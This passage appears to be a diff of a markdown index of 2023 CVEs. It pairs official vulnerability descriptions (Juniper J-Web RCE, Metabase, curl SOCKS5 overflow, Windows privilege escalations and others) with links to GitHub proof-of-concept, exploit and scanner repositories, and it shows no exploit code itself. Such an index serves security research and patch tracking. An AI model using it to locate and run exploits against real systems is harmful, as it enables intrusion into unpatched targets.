+### CVE-2023-36281 (2023-08-22) + +An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via a JSON file to load_prompt. This is related to __subclasses__ or a template. + + +- [tagomaru/CVE-2023-36281](https://github.com/tagomaru/CVE-2023-36281) +- [miguelc49/CVE-2023-36281-2](https://github.com/miguelc49/CVE-2023-36281-2) +- [miguelc49/CVE-2023-36281-1](https://github.com/miguelc49/CVE-2023-36281-1) + +### CVE-2023-36319 (2023-09-19) + +File Upload vulnerability in Openupload Stable v.0.4.3 allows a remote attacker to execute arbitrary code via the action parameter of the compress-inc.php file. + + +- [Lowalu/CVE-2023-36319](https://github.com/Lowalu/CVE-2023-36319) + +### CVE-2023-36407 (2023-11-14) + +Windows Hyper-V Elevation of Privilege Vulnerability + + +- [zha0/CVE-2023-36407](https://github.com/zha0/CVE-2023-36407) +- [pwndorei/CVE-2023-36407](https://github.com/pwndorei/CVE-2023-36407) + +### CVE-2023-36424 (2023-11-14) + +Windows Common Log File System Driver Elevation of Privilege Vulnerability + + +- [zerozenxlabs/CVE-2023-36424](https://github.com/zerozenxlabs/CVE-2023-36424) + +### CVE-2023-36427 (2023-11-14) + +Windows Hyper-V Elevation of Privilege Vulnerability + + +- [tandasat/CVE-2023-36427](https://github.com/tandasat/CVE-2023-36427) + +### CVE-2023-36531 (2024-12-13) + +Missing Authorization vulnerability in LiquidPoll LiquidPoll – Advanced Polls for Creators and Brands allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LiquidPoll – Advanced Polls for Creators and Brands: from n/a through 3.3.68. + + +- [RandomRobbieBF/CVE-2023-36531](https://github.com/RandomRobbieBF/CVE-2023-36531) + +### CVE-2023-36643 (2024-04-04) + +Incorrect Access Control in ITB-GmbH TradePro v9.5, allows remote attackers to receive all orders from the online shop via oordershow component in customer function. + + +- [caffeinated-labs/CVE-2023-36643](https://github.com/caffeinated-labs/CVE-2023-36643) + +### CVE-2023-36644 (2024-04-04) + +Incorrect Access Control in ITB-GmbH TradePro v9.5, allows remote attackers to receive all order confirmations from the online shop via the printmail plugin. + + +- [caffeinated-labs/CVE-2023-36644](https://github.com/caffeinated-labs/CVE-2023-36644) + +### CVE-2023-36645 (2024-04-04) + +SQL injection vulnerability in ITB-GmbH TradePro v9.5, allows remote attackers to run SQL queries via oordershow component in customer function. + + +- [caffeinated-labs/CVE-2023-36645](https://github.com/caffeinated-labs/CVE-2023-36645) + +### CVE-2023-36664 (2023-06-25) + +Artifex Ghostscript through 10.01.2 mishandles permission validation for pipe devices (with the %pipe% prefix or the | pipe character prefix). + + +- [jakabakos/CVE-2023-36664-Ghostscript-command-injection](https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection) +- [winkler-winsen/Scan_GhostScript](https://github.com/winkler-winsen/Scan_GhostScript) +- [jeanchpt/CVE-2023-36664](https://github.com/jeanchpt/CVE-2023-36664) +- [churamanib/CVE-2023-36664-Ghostscript-command-injection](https://github.com/churamanib/CVE-2023-36664-Ghostscript-command-injection) + +### CVE-2023-36723 (2023-10-10) + +Windows Container Manager Service Elevation of Privilege Vulnerability + + +- [Wh04m1001/CVE-2023-36723](https://github.com/Wh04m1001/CVE-2023-36723) + +### CVE-2023-36745 (2023-09-12) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [N1k0la-T/CVE-2023-36745](https://github.com/N1k0la-T/CVE-2023-36745) + +### CVE-2023-36802 (2023-09-12) + +Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability + + +- [chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802](https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802) +- [4zur-0312/CVE-2023-36802](https://github.com/4zur-0312/CVE-2023-36802) +- [x0rb3l/CVE-2023-36802-MSKSSRV-LPE](https://github.com/x0rb3l/CVE-2023-36802-MSKSSRV-LPE) +- [Nero22k/cve-2023-36802](https://github.com/Nero22k/cve-2023-36802) +- [ISH2YU/CVE-2023-36802](https://github.com/ISH2YU/CVE-2023-36802) + +### CVE-2023-36812 (2023-06-30) + +OpenTSDB is a open source, distributed, scalable Time Series Database (TSDB). OpenTSDB is vulnerable to Remote Code Execution vulnerability by writing user-controlled input to Gnuplot configuration file and running Gnuplot with the generated configuration. This issue has been patched in commit `07c4641471c` and further refined in commit `fa88d3e4b`. These patches are available in the `2.4.2` release. Users are advised to upgrade. User unable to upgrade may disable Gunuplot via the config option`tsd.core.enable_ui = true` and remove the shell files `mygnuplot.bat` and `mygnuplot.sh`. + + +- [ErikWynter/opentsdb_key_cmd_injection](https://github.com/ErikWynter/opentsdb_key_cmd_injection) + +### CVE-2023-36844 (2023-08-17) + +A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environment variables.\n\nUsing a crafted request an attacker is able to modify \n\ncertain PHP environment variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\nThis issue affects Juniper Networks Junos OS on EX Series:\n\n\n\n * All versions prior to 20.4R3-S9;\n * 21.1 versions 21.1R1 and later;\n * 21.2 versions prior to 21.2R3-S7;\n * 21.3 versions \n\nprior to \n\n 21.3R3-S5;\n * 21.4 versions \n\nprior to \n\n21.4R3-S5;\n * 22.1 versions \n\nprior to \n\n22.1R3-S4;\n * 22.2 versions \n\nprior to \n\n22.2R3-S2;\n * 22.3 versions \n\nprior to 22.3R3-S1;\n * 22.4 versions \n\nprior to \n\n22.4R2-S2, 22.4R3;\n * 23.2 versions prior to \n\n23.2R1-S1, 23.2R2.\n\n\n\n\n + + +- [watchtowrlabs/juniper-rce_cve-2023-36844](https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844) +- [ThatNotEasy/CVE-2023-36844](https://github.com/ThatNotEasy/CVE-2023-36844) +- [r3dcl1ff/CVE-2023-36844_Juniper_RCE](https://github.com/r3dcl1ff/CVE-2023-36844_Juniper_RCE) + +### CVE-2023-36845 (2023-08-17) + +A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series \n\nand SRX Series \n\nallows an unauthenticated, network-based attacker to remotely execute code.\n\nUsing a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code.\n\n\nThis issue affects Juniper Networks Junos OS on EX Series\n\n\nand \n\n\nSRX Series:\n\n\n\n * All versions prior to \n\n20.4R3-S9;\n * 21.1 versions 21.1R1 and later;\n * 21.2 versions prior to 21.2R3-S7;\n * 21.3 versions prior to 21.3R3-S5;\n * 21.4 versions prior to 21.4R3-S5;\n * 22.1 versions \n\nprior to \n\n22.1R3-S4;\n * 22.2 versions \n\nprior to \n\n22.2R3-S2;\n * 22.3 versions \n\nprior to \n\n22.3R2-S2, 22.3R3-S1;\n * 22.4 versions \n\nprior to \n\n22.4R2-S1, 22.4R3;\n * 23.2 versions prior to 23.2R1-S1, 23.2R2.\n\n\n\n\n + + +- [vulncheck-oss/cve-2023-36845-scanner](https://github.com/vulncheck-oss/cve-2023-36845-scanner) +- [kljunowsky/CVE-2023-36845](https://github.com/kljunowsky/CVE-2023-36845) +- [toanln-cov/CVE-2023-36845](https://github.com/toanln-cov/CVE-2023-36845) +- [halencarjunior/CVE-2023-36845](https://github.com/halencarjunior/CVE-2023-36845) +- [zaenhaxor/CVE-2023-36845](https://github.com/zaenhaxor/CVE-2023-36845) +- [simrotion13/CVE-2023-36845](https://github.com/simrotion13/CVE-2023-36845) +- [cyberh3als/CVE-2023-36845-POC](https://github.com/cyberh3als/CVE-2023-36845-POC) +- [3yujw7njai/ansible-cve-2023-36845](https://github.com/3yujw7njai/ansible-cve-2023-36845) +- [Asbawy/Automation-for-Juniper-cve-2023-36845](https://github.com/Asbawy/Automation-for-Juniper-cve-2023-36845) +- [jahithoque/Juniper-CVE-2023-36845-Mass-Hunting](https://github.com/jahithoque/Juniper-CVE-2023-36845-Mass-Hunting) +- [cyb3rzest/Juniper-Bug-Automation-CVE-2023-36845](https://github.com/cyb3rzest/Juniper-Bug-Automation-CVE-2023-36845) +- [CharonDefalt/Juniper-exploit-CVE-2023-36845](https://github.com/CharonDefalt/Juniper-exploit-CVE-2023-36845) +- [iveresk/CVE-2023-36845-6-](https://github.com/iveresk/CVE-2023-36845-6-) +- [ak1t4/CVE-2023-36845](https://github.com/ak1t4/CVE-2023-36845) +- [0xNehru/CVE-2023-36845-Juniper-Vulnerability](https://github.com/0xNehru/CVE-2023-36845-Juniper-Vulnerability) +- [ifconfig-me/CVE-2023-36845](https://github.com/ifconfig-me/CVE-2023-36845) +- [e11i0t4lders0n/CVE-2023-36845](https://github.com/e11i0t4lders0n/CVE-2023-36845) +- [Vignesh2712/Automation-for-Juniper-cve-2023-36845](https://github.com/Vignesh2712/Automation-for-Juniper-cve-2023-36845) + +### CVE-2023-36846 (2023-08-17) + +A Missing Authentication for Critical Function vulnerability in Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity.\n\n\n\nWith a specific request to user.php that doesn't require authentication an attacker is able to upload arbitrary files via J-Web, leading to a loss of \n\nintegrity\n\nfor a certain \n\npart of the file system, which may allow chaining to other vulnerabilities.\n\n\nThis issue affects Juniper Networks Junos OS on SRX Series:\n\n\n\n * All versions prior to 20.4R3-S8;\n * 21.1 versions 21.1R1 and later;\n * 21.2 versions prior to 21.2R3-S6;\n * 21.3 versions \n\nprior to \n\n 21.3R3-S5;\n * 21.4 versions \n\nprior to \n\n21.4R3-S5;\n * 22.1 versions \n\nprior to \n\n22.1R3-S3;\n * 22.2 versions \n\nprior to \n\n22.2R3-S2;\n * 22.3 versions \n\nprior to \n\n22.3R2-S2, 22.3R3;\n * 22.4 versions \n\nprior to \n\n22.4R2-S1, 22.4R3.\n\n\n\n\n + + +- [Chocapikk/CVE-2023-36846](https://github.com/Chocapikk/CVE-2023-36846) + +### CVE-2023-36874 (2023-07-11) + +Windows Error Reporting Service Elevation of Privilege Vulnerability + + +- [d0rb/CVE-2023-36874](https://github.com/d0rb/CVE-2023-36874) +- [crisprss/CVE-2023-36874](https://github.com/crisprss/CVE-2023-36874) +- [Wh04m1001/CVE-2023-36874](https://github.com/Wh04m1001/CVE-2023-36874) +- [Octoberfest7/CVE-2023-36874_BOF](https://github.com/Octoberfest7/CVE-2023-36874_BOF) + +### CVE-2023-36884 (2023-07-11) + +Windows Search Remote Code Execution Vulnerability + + +- [Maxwitat/CVE-2023-36884-Scripts-for-Intune-Remediation-SCCM-Compliance-Baseline](https://github.com/Maxwitat/CVE-2023-36884-Scripts-for-Intune-Remediation-SCCM-Compliance-Baseline) +- [deepinstinct/Storm0978-RomCom-Campaign](https://github.com/deepinstinct/Storm0978-RomCom-Campaign) +- [zerosorai/CVE-2023-36884](https://github.com/zerosorai/CVE-2023-36884) +- [tarraschk/CVE-2023-36884-Checker](https://github.com/tarraschk/CVE-2023-36884-Checker) +- [or2me/CVE-2023-36884_patcher](https://github.com/or2me/CVE-2023-36884_patcher) +- [ToddMaxey/CVE-2023-36884](https://github.com/ToddMaxey/CVE-2023-36884) +- [ridsoliveira/Fix-CVE-2023-36884](https://github.com/ridsoliveira/Fix-CVE-2023-36884) +- [raresteak/CVE-2023-36884](https://github.com/raresteak/CVE-2023-36884) +- [jakabakos/CVE-2023-36884-MS-Office-HTML-RCE](https://github.com/jakabakos/CVE-2023-36884-MS-Office-HTML-RCE) + +### CVE-2023-36899 (2023-08-08) + +ASP.NET Elevation of Privilege Vulnerability + + +- [d0rb/CVE-2023-36899](https://github.com/d0rb/CVE-2023-36899) +- [midisec/CVE-2023-36899](https://github.com/midisec/CVE-2023-36899) + +### CVE-2023-36900 (2023-08-08) + +Windows Common Log File System Driver Elevation of Privilege Vulnerability + + +- [RomanRybachek/CVE-2023-36900](https://github.com/RomanRybachek/CVE-2023-36900) + +### CVE-2023-37073 +- [Hamza0X/CVE-2023-37073](https://github.com/Hamza0X/CVE-2023-37073) + +### CVE-2023-37164 (2023-07-20) + +Diafan CMS v6.0 was discovered to contain a reflected cross-site scripting via the cat_id parameter at /shop/?module=shop&action=search. + + +- [ilqarli27/CVE-2023-37164](https://github.com/ilqarli27/CVE-2023-37164) + +### CVE-2023-37189 (2023-07-11) + +A stored cross site scripting (XSS) vulnerability in index.php?menu=billing_rates of Issabel PBX version 4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the Name or Prefix fields under the Create New Rate module. + + +- [sahiloj/CVE-2023-37189](https://github.com/sahiloj/CVE-2023-37189) + +### CVE-2023-37190 (2023-07-11) + +A stored cross-site scripting (XSS) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Virtual Fax Name and Caller ID Name parameters under the New Virtual Fax feature. + + +- [sahiloj/CVE-2023-37190](https://github.com/sahiloj/CVE-2023-37190) + +### CVE-2023-37191 (2023-07-11) + +A stored cross-site scripting (XSS) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Group and Description parameters. + + +- [sahiloj/CVE-2023-37191](https://github.com/sahiloj/CVE-2023-37191) + +### CVE-2023-37250 (2023-08-20) + +Unity Parsec has a TOCTOU race condition that permits local attackers to escalate privileges to SYSTEM if Parsec was installed in "Per User" mode. The application intentionally launches DLLs from a user-owned directory but intended to always perform integrity verification of those DLLs. This affects Parsec Loader versions through 8. Parsec Loader 9 is a fixed version. + + +- [ewilded/CVE-2023-37250-POC](https://github.com/ewilded/CVE-2023-37250-POC) + +### CVE-2023-37474 (2023-07-14) + +Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [ilqarli27/CVE-2023-37474](https://github.com/ilqarli27/CVE-2023-37474) + +### CVE-2023-37478 (2023-08-01) + +pnpm is a package manager. It is possible to construct a tarball that, when installed via npm or parsed by the registry is safe, but when installed via pnpm is malicious, due to how pnpm parses tar archives. This can result in a package that appears safe on the npm registry or when installed via npm being replaced with a compromised or malicious version when installed via pnpm. This issue has been patched in version(s) 7.33.4 and 8.6.8. + + +- [TrevorGKann/CVE-2023-37478_npm_vs_pnpm](https://github.com/TrevorGKann/CVE-2023-37478_npm_vs_pnpm) +- [li-minhao/CVE-2023-37478-Demo](https://github.com/li-minhao/CVE-2023-37478-Demo) + +### CVE-2023-37582 (2023-07-12) + +The RocketMQ NameServer component still has a remote command execution vulnerability as the CVE-2023-33246 issue was not completely fixed in version 5.1.1. \n\nWhen NameServer address are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system users that RocketMQ is running as. \n\nIt is recommended for users to upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x or 4.9.7 or above for RocketMQ 4.x to prevent these attacks.\n + + +- [Malayke/CVE-2023-37582_EXPLOIT](https://github.com/Malayke/CVE-2023-37582_EXPLOIT) + +### CVE-2023-37596 (2023-07-11) + +Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via a crafted script to the deleteuser function. + + +- [sahiloj/CVE-2023-37596](https://github.com/sahiloj/CVE-2023-37596) + +### CVE-2023-37597 (2023-07-11) + +Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via the delete user grouplist function. + + +- [sahiloj/CVE-2023-37597](https://github.com/sahiloj/CVE-2023-37597) + +### CVE-2023-37598 (2023-07-13) + +A Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via the delete new virtual fax function. + + +- [sahiloj/CVE-2023-37598](https://github.com/sahiloj/CVE-2023-37598) + +### CVE-2023-37599 (2023-07-13) + +An issue in issabel-pbx v.4.0.0-6 allows a remote attacker to obtain sensitive information via the modules directory + + +- [sahiloj/CVE-2023-37599](https://github.com/sahiloj/CVE-2023-37599) + +### CVE-2023-37621 +- [MY0723/CNVD-2022-27366__CVE-2023-37621](https://github.com/MY0723/CNVD-2022-27366__CVE-2023-37621) + +### CVE-2023-37625 (2023-08-10) + +A stored cross-site scripting (XSS) vulnerability in Netbox v3.4.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Custom Link templates. + + +- [benjaminpsinclair/Netbox-CVE-2023-37625](https://github.com/benjaminpsinclair/Netbox-CVE-2023-37625) + +### CVE-2023-37739 (2023-09-14) + +i-doit Pro v25 and below was discovered to be vulnerable to path traversal. + + +- [leekenghwa/CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below) + +### CVE-2023-37755 (2023-09-14) + +i-doit pro 25 and below and I-doit open 25 and below are configured with insecure default administrator credentials, and there is no warning or prompt to ask users to change the default password and account name. Unauthenticated attackers can exploit this vulnerability to obtain Administrator privileges, resulting in them being able to perform arbitrary system operations or cause a Denial of Service (DoS). + + +- [leekenghwa/CVE-2023-37755---Hardcoded-Admin-Credential-in-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37755---Hardcoded-Admin-Credential-in-i-doit-Pro-25-and-below) + +### CVE-2023-37756 (2023-09-14) + +I-doit pro 25 and below and I-doit open 25 and below employ weak password requirements for Administrator account creation. Attackers are able to easily guess users' passwords via a bruteforce attack. + + +- [leekenghwa/CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below) + +### CVE-2023-37771 (2023-07-31) + +Art Gallery Management System v1.0 contains a SQL injection vulnerability via the cid parameter at /agms/product.php. + + +- [anky-123/CVE-2023-37771](https://github.com/anky-123/CVE-2023-37771) + +### CVE-2023-37772 (2023-08-01) + +Online Shopping Portal Project v3.1 was discovered to contain a SQL injection vulnerability via the Email parameter at /shopping/login.php. + + +- [anky-123/CVE-2023-37772](https://github.com/anky-123/CVE-2023-37772) + +### CVE-2023-37778 +- [jyoti818680/CVE-2023-37778](https://github.com/jyoti818680/CVE-2023-37778) + +### CVE-2023-37779 +- [jyoti818680/CVE-2023-37779](https://github.com/jyoti818680/CVE-2023-37779) + +### CVE-2023-37786 (2023-07-13) + +Multiple cross-site scripting (XSS) vulnerabilities in Geeklog v2.2.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Mail Settings[backend], Mail Settings[host], Mail Settings[port] and Mail Settings[auth] parameters of the /admin/configuration.php. + + +- [Phamchie/CVE-2023-37786](https://github.com/Phamchie/CVE-2023-37786) + +### CVE-2023-37790 (2023-11-08) + +Jaspersoft Clarity PPM version 14.3.0.298 was discovered to contain an arbitrary file upload vulnerability via the Profile Picture Upload function. + + +- [kaizensecurity/CVE-2023-37790](https://github.com/kaizensecurity/CVE-2023-37790) + +### CVE-2023-37800 +- [TraiLeR2/CVE-2023-37800](https://github.com/TraiLeR2/CVE-2023-37800) + +### CVE-2023-37903 (2023-07-21) + +vm2 is an open source vm/sandbox for Node.js. In vm2 for versions up to and including 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code. This may result in Remote Code Execution, assuming the attacker has arbitrary code execution primitive inside the context of vm2 sandbox. There are no patches and no known workarounds. Users are advised to find an alternative software. + + +- [7h3h4ckv157/CVE-2023-37903](https://github.com/7h3h4ckv157/CVE-2023-37903) + +### CVE-2023-37941 (2023-09-06) + +If an attacker gains write access to the Apache Superset metadata database, they could persist a specifically crafted Python object that may lead to remote code execution on Superset's web backend.\n\nThe Superset metadata db is an 'internal' component that is typically \nonly accessible directly by the system administrator and the superset \nprocess itself. Gaining access to that database should\n be difficult and require significant privileges.\n\nThis vulnerability impacts Apache Superset versions 1.5.0 up to and including 2.1.0. Users are recommended to upgrade to version 2.1.1 or later.\n\n + + +- [Barroqueiro/CVE-2023-37941](https://github.com/Barroqueiro/CVE-2023-37941) + +### CVE-2023-37979 (2023-07-27) + +Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Saturday Drive Ninja Forms Contact Form plugin <= 3.6.25 versions. + + +- [Mehran-Seifalinia/CVE-2023-37979](https://github.com/Mehran-Seifalinia/CVE-2023-37979) +- [d0rb/CVE-2023-37979](https://github.com/d0rb/CVE-2023-37979) + +### CVE-2023-38035 (2023-08-21) + +A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration. + + +- [horizon3ai/CVE-2023-38035](https://github.com/horizon3ai/CVE-2023-38035) +- [LeakIX/sentryexploit](https://github.com/LeakIX/sentryexploit) +- [mind2hex/CVE-2023-38035](https://github.com/mind2hex/CVE-2023-38035) + +### CVE-2023-38039 (2023-09-15) + +When curl retrieves an HTTP response, it stores the incoming headers so that\nthey can be accessed later via the libcurl headers API.\n\nHowever, curl did not have a limit in how many or how large headers it would\naccept in a response, allowing a malicious server to stream an endless series\nof headers and eventually cause curl to run out of heap memory. + + +- [Smartkeyss/CVE-2023-38039](https://github.com/Smartkeyss/CVE-2023-38039) + +### CVE-2023-38041 (2023-10-25) + +A logged in user may elevate its permissions by abusing a Time-of-Check to Time-of-Use (TOCTOU) race condition. When a particular process flow is initiated, an attacker can exploit this condition to gain unauthorized elevated privileges on the affected system. + + +- [ewilded/CVE-2023-38041-POC](https://github.com/ewilded/CVE-2023-38041-POC) + +### CVE-2023-38120 (2024-05-03) + +Adtran SR400ac ping Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adtran SR400ac routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the ping command, which is available over JSON-RPC. A crafted host parameter can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code in the context of root.\n. Was ZDI-CAN-20525. + + +- [warber0x/CVE-2023-38120](https://github.com/warber0x/CVE-2023-38120) + +### CVE-2023-38146 (2023-09-12) + +Windows Themes Remote Code Execution Vulnerability + + +- [exploits-forsale/themebleed](https://github.com/exploits-forsale/themebleed) +- [Jnnshschl/CVE-2023-38146](https://github.com/Jnnshschl/CVE-2023-38146) +- [Durge5/ThemeBleedPy](https://github.com/Durge5/ThemeBleedPy) + +### CVE-2023-38408 (2023-07-20) + +The PKCS#11 feature in ssh-agent in OpenSSH before 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system. (Code in /usr/lib is not necessarily safe for loading into ssh-agent.) NOTE: this issue exists because of an incomplete fix for CVE-2016-10009. + + +- [kali-mx/CVE-2023-38408](https://github.com/kali-mx/CVE-2023-38408) +- [LucasPDiniz/CVE-2023-38408](https://github.com/LucasPDiniz/CVE-2023-38408) +- [classic130/CVE-2023-38408](https://github.com/classic130/CVE-2023-38408) +- [wxrdnx/CVE-2023-38408](https://github.com/wxrdnx/CVE-2023-38408) +- [mrtacojr/CVE-2023-38408](https://github.com/mrtacojr/CVE-2023-38408) +- [fazilbaig1/cve_2023_38408_scanner](https://github.com/fazilbaig1/cve_2023_38408_scanner) +- [Nick-Morbid/cve-2023-38408](https://github.com/Nick-Morbid/cve-2023-38408) + +### CVE-2023-38434 (2023-07-18) + +xHTTP 72f812d has a double free in close_connection in xhttp.c via a malformed HTTP request method. + + +- [Halcy0nic/CVE-2023-38434](https://github.com/Halcy0nic/CVE-2023-38434) + +### CVE-2023-38490 (2023-07-27) + +Kirby is a content management system. A vulnerability in versions prior to 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6 only affects Kirby sites that use the `Xml` data handler (e.g. `Data::decode($string, 'xml')`) or the `Xml::parse()` method in site or plugin code. The Kirby core does not use any of the affected methods.\n\nXML External Entities (XXE) is a little used feature in the XML markup language that allows to include data from external files in an XML structure. If the name of the external file can be controlled by an attacker, this becomes a vulnerability that can be abused for various system impacts like the disclosure of internal or confidential data that is stored on the server (arbitrary file disclosure) or to perform network requests on behalf of the server (server-side request forgery, SSRF).\n\nKirby's `Xml::parse()` method used PHP's `LIBXML_NOENT` constant, which enabled the processing of XML external entities during the parsing operation. The `Xml::parse()` method is used in the `Xml` data handler (e.g. `Data::decode($string, 'xml')`). Both the vulnerable method and the data handler are not used in the Kirby core. However they may be used in site or plugin code, e.g. to parse RSS feeds or other XML files. If those files are of an external origin (e.g. uploaded by a user or retrieved from an external URL), attackers may be able to include an external entity in the XML file that will then be processed in the parsing process. Kirby sites that don't use XML parsing in site or plugin code are *not* affected.\n\nThe problem has been patched in Kirby 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6. In all of the mentioned releases, the maintainers have removed the `LIBXML_NOENT` constant as processing of external entities is out of scope of the parsing logic. This protects all uses of the method against the described vulnerability. + + +- [Acceis/exploit-CVE-2023-38490](https://github.com/Acceis/exploit-CVE-2023-38490) + +### CVE-2023-38497 (2023-08-04) + +Cargo downloads the Rust project’s dependencies and compiles the project. Cargo prior to version 0.72.2, bundled with Rust prior to version 1.71.1, did not respect the umask when extracting crate archives on UNIX-like systems. If the user downloaded a crate containing files writeable by any local user, another local user could exploit this to change the source code compiled and executed by the current user. To prevent existing cached extractions from being exploitable, the Cargo binary version 0.72.2 included in Rust 1.71.1 or later will purge caches generated by older Cargo versions automatically. As a workaround, configure one's system to prevent other local users from accessing the Cargo directory, usually located in `~/.cargo`. + + +- [lucas-cauhe/cargo-perm](https://github.com/lucas-cauhe/cargo-perm) + +### CVE-2023-38499 (2023-07-25) + +TYPO3 is an open source PHP based web content management system. Starting in version 9.4.0 and prior to versions 9.5.42 ELTS, 10.4.39 ELTS, 11.5.30, and 12.4.4, in multi-site scenarios, enumerating the HTTP query parameters `id` and `L` allowed out-of-scope access to rendered content in the website frontend. For instance, this allowed visitors to access content of an internal site by adding handcrafted query parameters to the URL of a site that was publicly available. TYPO3 versions 9.5.42 ELTS, 10.4.39 ELTS, 11.5.30, 12.4.4 fix the problem. + + +- [miguelc49/CVE-2023-38499-2](https://github.com/miguelc49/CVE-2023-38499-2) +- [miguelc49/CVE-2023-38499-1](https://github.com/miguelc49/CVE-2023-38499-1) +- [miguelc49/CVE-2023-38499-3](https://github.com/miguelc49/CVE-2023-38499-3) + +### CVE-2023-38545 (2023-10-18) + +This flaw makes curl overflow a heap based buffer in the SOCKS5 proxy\nhandshake.\n\nWhen curl is asked to pass along the host name to the SOCKS5 proxy to allow\nthat to resolve the address instead of it getting done by curl itself, the\nmaximum length that host name can be is 255 bytes.\n\nIf the host name is detected to be longer, curl switches to local name\nresolving and instead passes on the resolved address only. Due to this bug,\nthe local variable that means "let the host resolve the name" could get the\nwrong value during a slow SOCKS5 handshake, and contrary to the intention,\ncopy the too long host name to the target buffer instead of copying just the\nresolved address there.\n\nThe target buffer being a heap based buffer, and the host name coming from the\nURL that curl has been told to operate with.\n + + +- [UTsweetyfish/CVE-2023-38545](https://github.com/UTsweetyfish/CVE-2023-38545) +- [imfht/CVE-2023-38545](https://github.com/imfht/CVE-2023-38545) +- [fatmo666/CVE-2023-38545-libcurl-SOCKS5-heap-buffer-overflow](https://github.com/fatmo666/CVE-2023-38545-libcurl-SOCKS5-heap-buffer-overflow) +- [vanigori/CVE-2023-38545-sample](https://github.com/vanigori/CVE-2023-38545-sample) +- [dbrugman/CVE-2023-38545-POC](https://github.com/dbrugman/CVE-2023-38545-POC) +- [bcdannyboy/CVE-2023-38545](https://github.com/bcdannyboy/CVE-2023-38545) +- [d0rb/CVE-2023-38545](https://github.com/d0rb/CVE-2023-38545) +- [Yang-Shun-Yu/CVE-2023-38545](https://github.com/Yang-Shun-Yu/CVE-2023-38545) +- [nphuang/NS-Project-2024-Spring](https://github.com/nphuang/NS-Project-2024-Spring) + +### CVE-2023-38571 (2023-07-28) + +This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Big Sur 11.7.9, macOS Monterey 12.6.8, macOS Ventura 13.5. An app may be able to bypass Privacy preferences. + + +- [gergelykalman/CVE-2023-38571-a-macOS-TCC-bypass-in-Music-and-TV](https://github.com/gergelykalman/CVE-2023-38571-a-macOS-TCC-bypass-in-Music-and-TV) + +### CVE-2023-38609 (2023-07-28) + +An injection issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13.5. An app may be able to bypass certain Privacy preferences. + + +- [mc-17/CVE-2023-38609](https://github.com/mc-17/CVE-2023-38609) + +### CVE-2023-38632 (2023-07-21) + +async-sockets-cpp through 0.3.1 has a stack-based buffer overflow in tcpsocket.hpp when processing malformed TCP packets. + + +- [Halcy0nic/CVE-2023-38632](https://github.com/Halcy0nic/CVE-2023-38632) + +### CVE-2023-38646 (2023-07-21) + +Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2. + + +- [adriyansyah-mf/CVE-2023-38646--Metabase-](https://github.com/adriyansyah-mf/CVE-2023-38646--Metabase-) +- [Pumpkin-Garden/POC_Metabase_CVE-2023-38646](https://github.com/Pumpkin-Garden/POC_Metabase_CVE-2023-38646) +- [0xrobiul/CVE-2023-38646](https://github.com/0xrobiul/CVE-2023-38646) +- [Chocapikk/CVE-2023-38646](https://github.com/Chocapikk/CVE-2023-38646) +- [Xuxfff/CVE-2023-38646-Poc](https://github.com/Xuxfff/CVE-2023-38646-Poc) +- 